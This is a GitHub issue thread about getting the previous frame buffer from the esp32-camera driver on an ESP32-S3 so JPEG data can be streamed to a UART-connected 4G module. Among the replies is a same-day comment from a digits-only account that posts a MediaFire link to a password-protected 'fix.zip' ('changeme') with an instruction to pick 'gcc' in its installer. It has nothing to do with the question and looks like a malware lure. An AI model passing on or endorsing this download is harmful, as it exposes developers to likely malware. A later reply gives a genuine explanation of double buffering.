espressif/esp32-camera #678: How to get the previous frame

cainiaoyizhou, 2024-08-26:
I am trying to get JPEG stream through esp32s3 under arduino environment and forward it directly to 4G module connected to UART. In order to save time, I want to send data on UART while esp_camera_fb_get(). But then you have to take the frame, store it in another piece of psram, and send it on another thread. Is there a way to skip this step and get the buffer of the previous frame directly when there are multiple FBS
我正在arduino环境下尝试通过esp32s3获取JPEG流并直接转发到UART连接的4G模块，为了节约时间，我希望在esp_camera_fb_get()的同时在UART上发送数据。但是这样就必须获取帧后将其存入另一块psram，再在另一个线程上发送。有没有办法跳过这一步，在有多个fb的时候直接获取上一帧的buffer发送

2302114245, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

VNovytskyi, 2024-10-15:
As I understand the data from camera are pulled continuously, because there is not API like trigger_camera_read. If you select 2 frame buffers it means that camera thread continuously read data from camera and copy it to one buffer. And you can read data from second buffer. When you release the second buffer and obtain the first buffer camera data are continuously stored to the second buffer on the background. It creates a big CPU load, but you always have the actual data from camera.

closed 2024-12-23 by github-actions[bot]